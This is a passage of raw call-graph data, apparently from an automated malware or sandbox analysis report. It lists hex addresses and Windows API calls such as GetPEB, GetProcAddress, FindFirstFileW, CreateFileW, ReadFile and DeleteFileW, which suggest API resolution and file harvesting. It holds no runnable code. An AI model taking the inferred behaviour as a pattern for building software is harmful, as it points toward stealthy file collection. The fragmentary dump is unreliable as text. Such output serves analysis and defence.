calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap RtlFreeHeap 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap RtlFreeHeap 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 8218->8250 8221->8218 8225 4031e5 4 API calls 8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 FindCloseChangeNotification 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap RtlFreeHeap 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 20 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 403f7b 8957->8960 8958 403d74 15 API calls 8958->8961 8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 12 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 13 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 9028->8982 9030 4031e5 4 API calls 9029->9030 9031 412539 9030->9031 9031->9000 9033 40488c 5 API calls 9032->9033 9034 4125ec 9033->9034 9035 41269f 9034->9035 9036 4031e5 4 API calls 9034->9036 9035->9008 9037 412609 9036->9037 9039 4031e5 4 API calls 9037->9039 9044 41268f 9037->9044 9038 403c40 5 API calls 9038->9035 9040 41262a 9039->9040 9048 412675 9040->9048 